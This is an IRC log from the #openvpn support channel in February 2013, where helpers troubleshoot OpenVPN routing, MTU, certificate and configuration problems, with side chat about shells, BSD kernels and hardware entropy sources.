19:41 < pekster> Yea, I do bourne-esque development for openwrt, and sometimes I forget how nice bash is until I don't have it 19:41 < pekster> bluethundr: np, sorry about spamming the channel with my missed copy of the one-liner you needed 19:42 < pekster> krzee: I've also grown fond of zsh's "multios" feature. It can do fun stuff like this: echo "hello world" > >(md5sum) > >(sha1sum) 19:42 < pekster> So it basically takes stdout and clones it to multiple targets in parallel 19:43 < bluethundr> hey that's fine. but you should've used my pastebin instead lololol 19:43 < pekster> Granted you can redirect fd's in bash too, but it looks really ugly 19:45 <@krzee> even with fd's youd need tee in bash 19:45 <@krzee> to send it to multiple at once 19:45 <@krzee> afaik 19:46 < pekster> Well, you can duplicate, so make say fd4 a clone of fd1, then do background processing on fd1 & fd4, but it just looks ugly 19:46 <@krzee> oh yes true 19:46 < pekster> zsh does that a lot cleaner. And until bash4, zsh had associative arrays that bash3 didn't, but that advantage is moot now 19:47 <@krzee> they're handy 19:47 < pekster> I do hate hopping between complex bash and zsh development due to quirks like some indexing is 0 vs 1 based depending on the shell used. That's a great way to mess with one's head 19:47 <@krzee> ive used them a bit 19:47 <@krzee> ya ive never actually played with zsh 19:48 < pekster> zsh is my preferred interactive shell, although I tend to script in bash unless I actually need zsh features 19:48 < pekster> (partly for portability, and partly so my brain doesn't hurt when editing my vs system scripts) 19:49 <@krzee> i thought you use freebsd 19:49 < pekster> Nope, not really a BSD guy, although I don't mind NetBSD if one actually needs a Unix 19:50 <@krzee> now that you say that i remember you having said it before 19:50 < pekster> NetBSD had a decent userland, but I still don't like the BSD kernel phiolsophy 19:50 <@krzee> i love the (free?)bsd hier philosophy 19:50 <@krzee> i dunno if the other bsd's follow it or not, but freebsd's hier is what i feel is right 19:51 <@krzee> http://www.freebsd.org/cgi/man.cgi?query=hier&sektion=7 19:51 <@vpnHelper> Title: hier(7) (at www.freebsd.org) 19:52 < pekster> Last $job NetBSD routers were used everywhere except at the DC core routing, and it generally workred fine. One day we were overflowing state tracking for the office NAT router, and we "couldn't" fix it as it required a reboot to the new kernel for increased state, and a reboot would drop the statelessly (thus "working") VoIP calls sales had 19:52 < pekster> Linux does that via a simple sysfs node, so no reboot 19:53 -!- kantlivelong [~kantlivel@47.23.189.90] has joined #openvpn 19:53 < pekster> Stuff like that causes me to shake my head at the monolithic design 19:56 < pekster> Oh, flood-protection fixed; apparently I didn't copy over the max_msgs variable from my other network stanza 19:57 -!- kantlivelong [~kantlivel@47.23.189.90] has quit [Ping timeout: 245 seconds] 20:05 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 20:36 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 20:38 -!- p3rror [~mezgani@41.249.25.162] has quit [Read error: Operation timed out] 20:38 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Ping timeout: 255 seconds] 21:14 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection] 21:32 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 245 seconds] 21:38 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 276 seconds] 21:51 -!- kantlivelong [~kantlivel@47.23.189.90] has joined #openvpn 22:04 -!- dougquaid [~brian@pool-173-72-191-174.clppva.fios.verizon.net] has quit [Ping timeout: 252 seconds] 22:07 -!- dougquaid [~brian@173.72.191.174] has joined #openvpn 22:09 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn 22:10 -!- zach [~zach@nat-192-95-29-123.bhs1.montreal.qbc.ca.nuked.co] has quit [Ping timeout: 240 seconds] 22:14 -!- dougquaid [~brian@173.72.191.174] has quit [Quit: Leaving] 22:17 -!- zach [~zach@nat-192-95-29-123.bhs1.montreal.qbc.ca.nuked.co] has joined #openvpn 22:47 < kantlivelong> does openvpn LZO+BF-CBC require alot of cpu power? 22:47 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Ping timeout: 252 seconds] 22:47 -!- rob0 [rob0@harrier.slackbuilds.org] has joined #openvpn 22:47 -!- rob0 [rob0@harrier.slackbuilds.org] has quit [Changing host] 22:47 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn 23:01 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 23:11 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 23:15 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Excess Flood] 23:16 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn --- Day changed Tue Feb 26 2013 00:04 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 00:11 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Quit: ZNC - http://znc.in] 00:16 -!- Teck7__ is now known as rfxn 00:48 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has quit [Quit: nonotza] 00:49 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 00:49 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 01:12 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 01:16 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds] 01:20 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 01:30 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 01:36 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds] 01:39 -!- Netsplit *.net <-> *.split quits: VunKruz, meepmeep 01:40 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [] 01:40 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 01:43 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 01:46 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 01:51 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 01:52 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 01:59 -!- sh_t [~sht@176.222.238.158] has joined #openvpn 02:00 < sh_t> hi everyone. i'm looking to use a vpn on top of a vpn. the first vpn is a tun and the second (which will connect over the first) is tap. i've been advised that i will probably run into mtu sizing problems. can anyone suggest how to size each accordingly? I don't have control over the second tap link's server settings because it's a subscribed service. 02:03 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Quit: off to do some thoughtcrime] 02:07 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 02:21 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds] 02:35 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 02:36 -!- zz_AsadH is now known as AsadH 02:37 -!- AsadH is now known as zz_AsadH 02:49 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 272 seconds] 02:56 -!- dazo_afk is now known as dazo 03:03 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 03:17 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds] 03:17 -!- Suterusu1 [~EyeR@81.152.141.152] has joined #openvpn 03:23 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 252 seconds] 03:28 -!- master_of_master [~master_of@p57B5596B.dip.t-dialin.net] has quit [Ping timeout: 276 seconds] 03:30 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 03:31 -!- Suterusu1 [~EyeR@81.152.141.152] has quit [Ping timeout: 245 seconds] 03:40 -!- mnice [~jdoe@84.242.118.58] has left #openvpn [] 03:40 -!- knobo [~user@ti0125a380-1018.bb.online.no] has joined #openvpn 03:40 < knobo> To make vpn start at boot, do I need to make certificates without password then? 03:41 < EugeneKay> For unattended, yes. 03:43 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds] 03:44 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 04:01 -!- Suterusu1 [~EyeR@81.152.141.152] has joined #openvpn 04:03 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 272 seconds] 04:11 -!- sqwerty [~sqwerty@rubberductions.plus.com] has joined #openvpn 04:11 -!- sqwerty [~sqwerty@rubberductions.plus.com] has quit [Changing host] 04:11 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn 04:15 -!- baobei [~baobei@180.155.14.35] has joined #openvpn 04:16 < baobei> whats the server side directive to allow sharing of client certs 04:17 < EugeneKay> !dupe 04:17 <@vpnHelper> "dupe" is (#1) see --duplicate-cn in the manual (!man) to see how to allow multiple clients to use the same key (NOT recommended) or (#2) instead, use !pki to make a cert for each user 04:17 -!- Suterusu1 [~EyeR@81.152.141.152] has quit [Ping timeout: 245 seconds] 04:17 < baobei> thanks 04:18 < baobei> using that i dont need to add anything to the client config? 04:19 -!- baobei [~baobei@180.155.14.35] has quit [Client Quit] 04:22 < EugeneKay> Nope. 04:27 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: No route to host] 04:27 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 04:37 -!- p3rror [~mezgani@41.140.231.29] has joined #openvpn 04:38 -!- ade_b [~Ade@109.46.114.162] has joined #openvpn 04:38 -!- ade_b [~Ade@109.46.114.162] has quit [Changing host] 04:38 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 04:41 -!- [Xaronic] is now known as deadmoose 04:43 -!- deadmoose is now known as [Xaronic] 05:23 -!- novaflash is now known as novaflash_away 05:23 -!- novaflash_away is now known as novaflash 05:50 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 05:50 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 05:58 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 05:58 -!- Mcloven [~Mcloven@203.122.218.215] has joined #openvpn 06:03 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 06:04 -!- Mcloven [~Mcloven@203.122.218.215] has quit [Read error: Connection reset by peer] 06:04 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 245 seconds] 06:16 -!- ade_b [~Ade@ip-109-84-70-107.web.vodafone.de] has joined #openvpn 06:16 -!- ade_b [~Ade@ip-109-84-70-107.web.vodafone.de] has quit [Changing host] 06:16 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 06:27 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 06:28 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds] 06:28 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 06:36 -!- voidnecron [~voidnecro@unaffiliated/necron] has joined #openvpn 06:36 < voidnecron> Hi 06:37 < voidnecron> Anyone having or knows about issues with Win8? 06:37 < voidnecron> once in a while it crashes on connecting 06:37 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Quit: Reconnecting] 06:37 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 06:41 -!- Mcloven_ [~Mcloven@203.122.218.215] has joined #openvpn 06:42 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 06:44 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 240 seconds] 06:46 -!- wykydtron [tassadar@persephone.darkness-reigns.net] has quit [Ping timeout: 264 seconds] 06:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:06 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 07:08 -!- wykydtron [tassadar@persephone.darkness-reigns.net] has joined #openvpn 07:17 -!- Mcloven_ [~Mcloven@203.122.218.215] has quit [Ping timeout: 245 seconds] 07:18 -!- cherwin [~cherwin@ip4da6274e.direct-adsl.nl] has quit [Quit: leaving] 07:20 < pcdummy> Can't get my routes up to ping the clients behind my openvpn server :/ 07:21 < pcdummy> This is the server conf: http://pastie.org/6340959 and this the clients: http://pastie.org/6340967 07:22 < pcdummy> I can ping the OpenVPN Server (10.8.0.1) and its private IP (192.168.142.1) but not the other clients ( 192.168.142.2 for example ) 07:23 < pcdummy> http://pastie.org/6340974 <-- ping to .2 07:34 -!- ade_b [~Ade@ip-109-84-184-98.web.vodafone.de] has joined #openvpn 07:34 -!- ade_b [~Ade@ip-109-84-184-98.web.vodafone.de] has quit [Changing host] 07:34 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 07:45 < pekster> pcdummy: You don't need the route statement on line 23 on the client config since the server pushes it (it doesn't hurt, but it's simply not necessary) 07:45 < pekster> pcdummy: My guess is you didn't set up the return-routing on the server's LAN; is the VPN server also the default gateway there? 07:45 < pekster> !serverlan 07:45 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 07:52 < pcdummy> pekster: i think libvirt is the "problem" 08:14 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 246 seconds] 08:15 < pcdummy> pekster: now i moved the OpenVPN into the lan, still can't ping other hosts except the VPN Server :/ 08:16 < pcdummy> i followed that flowchart. 08:16 < pekster> I never got an answer to my earlier question about the server network gateway and the VPN server 08:17 < pekster> You likely have a firewall or routing problem 08:17 < pekster> firewall on the VPN server or the LAN's gw, or a routing issue on the gw 08:18 < pcdummy> pekster: its a single server machine running KVM on it, now the ovpn is running in a host only "virtual network" 08:19 < pekster> Right, but you need a return-route 08:19 < pekster> If there is no default gateway, packets cannot "get back" to the VPN network 08:20 < pekster> A "host only" network doesn't tend to have a gateway. It's a standalone, non-routable LAN. You need it to be routable if you expect packets to be routed to/from the network, or I suppose you could SNAT everything going in and it'll appear to inside machines as if the VPN server (presumably in the "host only" network itself) sent all the traffic 08:21 < pekster> See yourself where the LAN system wants to send the return packet with 'ip route get 10.8.0.6' or such 08:22 < pcdummy> would love to SNAT ovpn 08:23 < havoc> interesting: http://www.entropykey.co.uk/ 08:23 <@vpnHelper> Title: Simtec Electronics Entropy Key: USB True Random Number Generator (at www.entropykey.co.uk) 08:23 < pekster> It's just silly to do that for rfc1918 space where you have as much as you could want. It makes sense on the IPv4 Internet where we're short addresses, but not on internal networks generally 08:24 < pekster> havoc: Yea, entropy generation is an issue for systems like webservers doing a lot of https transactions in short order as every one eats entropy 08:25 < havoc> I kindof crossposted to #proxmox too 08:25 < pekster> If an app actually needs /dev/random (not the non-blocking and less-secure urandom device) it'll block and cause connectiosn to be delayed 08:25 < havoc> it'd be real useful for topping of entropy pools on VMs 08:25 < havoc> s/of/off/ 08:26 < pekster> It's "less" of an issue for openvpn since one doesn't generally get that kind of churn on entropy from normal oepnvpn usage. I'm discounting silly cases where you re-key the static keys every 15 seconds per client or something 08:26 < havoc> yeah 08:26 < pekster> Beyond testing rekeys, that's just stupid 08:26 < havoc> but I figured some here might still find it interesting :) 08:26 < pekster> Yup, hardware entropy is a nifty solution to the problem 08:27 < pekster> I also have a downloaded collection of 16k files from random.org. I tend to use them to pull out 64-bit numbers to seed my minecraft worlds ;) 08:27 < havoc> heh 08:28 < havoc> that entropy key is neat because it can be added to existing entropy pools 08:28 < havoc> and you can use more than one 08:29 < havoc> especially nice/handy if you have one of those mobos w/ one or two USB plugs on the mobo itself 08:29 < pekster> Yea, it's got great uses on embeeded hardware (assuming proper OS support) for things like the rPi and such 08:30 < pekster> There's a great article I like to refer to that discusses how the Linux kernel in particular has bad entropy on those systems as they lack traditional disk, keyboard, or mouse (the main sources of entropy) and in early-boot there's little-to-no network activity, making entropy dangerously low 08:31 < havoc> and no sound cards either; those are excellent sources of entropy 08:31 < havoc> a little DSP on the mic input, and done 08:32 < havoc> but yeah, you need either truly random (i.e. human) input, or analog input 08:32 < havoc> hard to get that w/ no HID 08:33 < pekster> f.eg, I have 2 headless servers at home: one is an app server that runs rtorrent all day long seeding FOSS materials, and the other is an admin box basically idling and doing some syslog collection. The app server has good entropy most of the time since it's got a constant flow of network & disk traffic; not so for the admin box that does very little of either 08:34 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 08:34 < pekster> http://paste.kde.org/681884/ 08:34 < pekster> :) 08:35 < havoc> substantial diff there 08:36 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 08:49 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 255 seconds] 08:49 -!- brute11k1 [~brute11k@89.249.235.210] has joined #openvpn 08:51 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 08:58 < EugeneKay> Webcam, lava lamp. 09:01 <@ecrist> !vend 09:01 <@ecrist> aww 09:02 <@ecrist> we used to have something in there, back in the day 09:04 -!- baobei [~baobei@180.155.14.35] has joined #openvpn 09:07 -!- ade_b [~Ade@ip-109-41-1-25.web.vodafone.de] has joined #openvpn 09:07 -!- ade_b [~Ade@ip-109-41-1-25.web.vodafone.de] has quit [Changing host] 09:07 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 09:08 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 09:28 -!- erich [~erich@host19.duncable.cust.sover.net] has joined #openvpn 09:34 -!- erich [~erich@host19.duncable.cust.sover.net] has quit [Quit: erich] 09:53 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 10:03 -!- brute11k1 [~brute11k@89.249.235.210] has quit [Read error: Connection reset by peer] 10:05 -!- baobei [~baobei@180.155.14.35] has quit [Read error: Operation timed out] 10:06 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 10:07 -!- baobei [~baobei@101.93.91.186] has joined #openvpn 10:10 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 10:10 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:20 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 10:20 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 10:22 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn 10:25 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 10:29 -!- JSharpe [~JSharpe@10-253-3-31-anc.floodtel.net] has joined #openvpn 10:32 -!- baobei [~baobei@101.93.91.186] has quit [Read error: Connection timed out] 10:33 -!- baobei [~baobei@101.93.91.186] has joined #openvpn 10:33 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 10:34 -!- bjh4 [~bjh4@12.239.198.1] has joined #openvpn 10:37 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 10:39 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:42 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 10:42 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 10:42 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 10:42 -!- mode/#openvpn [+o krzee] by ChanServ 10:43 -!- brute11k [~brute11k@89.249.235.210] has quit [Read error: Connection reset by peer] 10:57 -!- baobei [~baobei@101.93.91.186] has quit [Ping timeout: 255 seconds] 10:57 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 11:08 -!- raidz_away is now known as raidz 11:17 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:18 -!- hotwings [hd@secksy.net] has joined #openvpn 11:19 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 11:19 -!- mode/#openvpn [+v s7r] by ChanServ 11:25 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 264 seconds] 11:50 -!- coreGrl [~a@host18-17-dynamic.4-87-r.retail.telecomitalia.it] has joined #openvpn 11:50 < coreGrl> hi 11:53 < coreGrl> I've this kind of warning on linux, WARNING: potential route subnet conflict between local LAN [192.168.1.0/255.255.255.0] and remote VPN [192.168.1.20/255.255.255.255] and on linux I can connect to 1.20 on windows 7 it doesn't :( yes I know I've the same ip addresses on the two lan, but there is a way to solve this on windows? on linux it works :( 11:54 < pekster> Fix your network numbering. No, you can't reasonably fix that without fixing your broken network numbering scheme 11:54 < pekster> Pick one of the other 255 /24 networks in the 192.168/16 block. 11:55 < coreGrl> not so easy to achieve I'm not the netwrok manager on both lan :( 11:55 < pekster> I suppose you can see the --client-nat option in the 2.3.x release, but that's a Bad Idea™ that you should never do 11:56 < pekster> Then you need to go slap whoever set up the VPN to use what is probably the single most common network for home routers 11:56 * neilhwatson wonders if pekster is a bot or simply chained to his keyboard. 11:57 < pekster> Turing Complete ;) 12:02 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 12:03 < hotwings> PUSH: Received control message: 'PUSH_REPLY,topology subnet,route-gateway 10.200.0.1,dhcp-option DNS 208.67.222.222,dhcp-option DNS 208.67.220.220,redirect-gateway def1,ifconfig 10.200.2.8 255.255.252.0' <--- any idea why i keep getting a 10.200.x.x ip instead of a real one?! 12:04 < pekster> That's what the served pushed. Post the server config file if you need help figuring out why that's happening 12:05 < neilhwatson> What IP were you expecting? 12:05 < pekster> Also, you should avoid use of OpenDNS; they violate spec to send you to their advertising servers for invalid domains 12:05 < hotwings> do you happen to know the exact filename (in linux)?.. sorry, im new to openvpn 12:06 < pekster> exact filename of what? 12:06 < neilhwatson> Now I'm sure. Only a bot does PTR lookups :). Look in /etc/openvpn/. 12:06 < hotwings> " Post the server config file if you need help figuring out why that's happening" <-- that 12:07 < pekster> neilhwatson: PTR lookups? No, I just know that IP by heart and also hate OpenDNS with a passion since they violate basic Internet protocol 12:07 < hotwings> i only see "client.cfg".. not *server* 12:07 < pekster> hotwings: The server config would be on your openvpn server, obviously 12:08 < pekster> I suppose you could call it "client.cfg" but that would be a bad name. You could call it "my_dog.jpg" too for all openvpn cares: a config is just a text file 12:10 < hotwings> i didnt name it that, its the stock name 12:10 < pekster> !learn opendns as You should avoid using OpenDNS for pushed DNS servers as they violate spec and send you to ad/search domains for mistyped URLs. Use GoogleDNS insteaad. See !dns for more info. 12:10 <@vpnHelper> Joo got it. 12:11 < pekster> hotwings: I don't cate what you named if. The client is getting an IP issued to it from 10/8 becuase that is what the server has pushed, usually via an --ifconfig-pool or --server option. Paste your openvpn *server* configuration file if you can't figure out why that's happening 12:12 < pekster> This is completely normal in many setups; it's rare to have enough public IPs to waste them on connecting VPN clients, so I don't really see what's "broken" unless you're expecting to get a globally-routable IP 12:15 < hotwings> by server are you referring to virtual private network daemon. as in: "[ ok ] Starting virtual private network daemon:." 12:15 < pekster> The config file. The actual configuration that openvpn is being started with 12:16 < pekster> Usually it's stored in /etc/openvpn/ on Unix-like systems, but a distro can put this file anywhere it pleases 12:16 < pekster> And I'm talking about this config file on your server. Not your client (where you're getting that IP assigned) but the server that is assigning it 12:17 < sh_t> hey everyone. im using an openvpn client (tap) on top of an (or rather inside of) another openvpn client (tun). There seems to be MTU issues because I can use ICMP but websites dont load. I don't have control over the server side config for the tap adapter. what would be the best way to go about fixing this? increasing the MTU on the tun server and client side? 12:18 < hotwings> the only thing in /etc/openvpn is update-resolv-conf... so i guess i try to figure out where debian puts that stupid file 12:18 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 245 seconds] 12:19 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 12:20 < neilhwatson> In Debian /etc/init.d/openvpn reads /etc/openvpn/*.conf 12:20 < pekster> sh_t: You might need a lower --tun-mtu value. Try determining the MTU of the inside tunnel by using the --mtu-test option to the VPN endpoing inside your first tunnel 12:20 < pekster> Or solve the problem by not tunneling VPN tunnels like that ;) 12:21 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 248 seconds] 12:21 <@krzee> try to get off tap 12:21 < hotwings> thanks neilhwatson. the only file in my /etc/openvpn/ dir is update-resolv-conf.. so no *.conf there 12:21 <@krzee> what layer2 proto do you need? 12:22 < pekster> I'm more curious why there's a need to run a VPN inside another VPN tunnel personally :) 12:22 <@krzee> ^ sh_t 12:22 < sh_t> krzee: it's just a subscribed vpn that has a provided config. not optimal i know, just trying to work with this 12:22 < sh_t> but I do have control over the outer tun adapter on both ends 12:22 <@krzee> that makes no sense 12:22 <@krzee> dont stack them 12:23 <@krzee> pekster, when i wrote vpnchains link my motivation was to be able to use less trusted boxes to build the outter layer of the darknet, while not trusting them with the data going over the darknet 12:23 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has joined #openvpn 12:24 <@krzee> but that seems to not be his motivation, so i dunno 12:25 <@krzee> https://www.secure-computing.net/wiki/index.php/OpenVPN/VpnChains 12:25 <@vpnHelper> Title: OpenVPN/VpnChains - Secure Computing Wiki (at www.secure-computing.net) 12:25 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 12:26 < pekster> Right. Same principle as tor, and it's slow for a reason :P 12:26 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 12:27 <@krzee> actually i caught some weird results, bandwidth did not go down 12:27 <@krzee> actually had higher iperf results 12:27 <@krzee> we talked about it before, you said additional tests should have been done ;] 12:28 < pekster> It doesn't scale; on the Internet at large you end up with more points of failure/latency/dropouts 12:28 < hotwings> this, /etc/default/openvpn, is the only config file of any kind im finding: http://pastebin.com/NUNQBUsd every other file listed in /var/lib/dpkg/info/openvpn.conffiles is a script 12:28 <@krzee> definitely doesnt scale 12:28 <@krzee> not well at least 12:28 < pekster> hotwings: That is not an openvpn config file. You can see samples of actual config files here: 12:28 < pekster> !sample 12:28 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting 12:28 < pekster> Or at the official howto here: 12:28 < pekster> !howto 12:28 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 12:29 < pekster> hotwings: How did you configure your server if you didn't create an openvpn config file? That is a required part of OpenVPN setup... 12:30 <@krzee> oh and if you want your hand held through configuring it: 12:31 <@krzee> !confgen 12:31 <@vpnHelper> "confgen" is (#1) http://www.doeshosting.com/code/openvpn-confgen.tgz for the bash config generator or (#2) you can use svn co http://www.secure-computing.net/svn/trunk/openvpn-confgen/ or (#3) you must run this in bash 12:31 < hotwings> the direction i was given said to install the openvpn package, download the client, and run it. i did it and it works most of the time but sometimes i get these 10.200.x.x ips and nothing work. so before i would just restart it until it worked again. but i'd rather figure this problem out and solve it for good now. 12:31 <@krzee> i made a lil bash script which holds your hand and walks through it with ya 12:32 < pekster> hotwings: Do you not control the server? If you are not the admin of the server, we cannot help you diagnoise problems with the setup... 12:32 < pekster> (especially things like why they're giving you an rfc1918 IP if that's not what you expected) 12:33 <@krzee> ah 12:33 < hotwings> i have full access to the box, meaning root. 12:33 <@krzee> !provider 12:33 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team. 12:33 < pekster> hotwings: The server, right? 12:33 <@krzee> you have root on the server? 12:33 < hotwings> the box openvpn is installed on, yes 12:33 < pekster> OpenVPN is installed on *both* the client and server 12:33 <@krzee> there are 2 boxes openvpn are installed on 12:33 < pekster> I am telling you that I need to see your server config file in order to help you understand the IP your are getting on the client 12:34 <@krzee> well 2+ 12:34 < pekster> If you do not control the server, I will be unable to be of any help to you 12:34 < hotwings> then the client and the server are installed on one box because there is only one box 12:34 < pekster> No, there's not. You are connected to *another* system 12:34 < pekster> That's how VPNs work ;) 12:34 <@krzee> you have a vpn provider, right? 12:34 <@krzee> they gave you stuff to install, right? 12:35 < hotwings> the direction i was given said to install the openvpn package, download the client, and run it. 12:35 <@krzee> who gave these directions 12:35 < hotwings> that was done on a single box 12:36 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Read error: Connection reset by peer] 12:37 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has joined #openvpn 12:37 -!- kyrix [~ashley@chello084112114196.33.11.vie.surfer.at] has quit [Read error: Connection reset by peer] 12:47 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has quit [Remote host closed the connection] 12:59 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds] 13:00 -!- DrCode_ [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 13:03 -!- anto [~chatzilla@14.140.176.210] has joined #openvpn 13:04 -!- DrCode 